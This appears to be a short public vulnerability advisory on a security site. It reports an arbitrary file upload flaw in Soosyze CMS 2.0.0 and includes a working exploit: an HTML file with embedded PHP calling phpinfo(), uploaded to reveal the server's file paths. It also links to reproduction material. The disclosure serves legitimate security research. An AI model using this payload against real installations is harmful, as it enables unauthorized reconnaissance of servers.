Soosyze 2.0.0 Arbitrary File Upload

2023.09.09
Credit: nu11secur1ty
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

## Title: soosyze 2.0.0 - File Upload ## Author: nu11secur1ty ## Date: 04.26.2023-08.28.2023 ## Vendor: https://soosyze.com/ ## Software: https://github.com/soosyze/soosyze/releases/tag/2.0.0 ## Reference: https://portswigger.net/web-security/file-upload ## Description: Broken file upload logic. The malicious user can upload whatever he wants to an HTML file and when he tries to execute it he views almost all file paths. This could be worse than ever, it depends on the scenario. STATUS: HIGH Vulnerability [+]Exploit: ```HTML <!DOCTYPE html> <html> <head> <title>Hello broken file upload logic, now I can read your special directory pats, thank you ;)</title> </head> <body> <h1> <?php phpinfo(); ?> </h1> </body> </html> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/soosyze/2023/soosyze-2.0.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/05/soosyze-200-file-path-traversal-broken.html) ## Time spend: 01:27:00


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top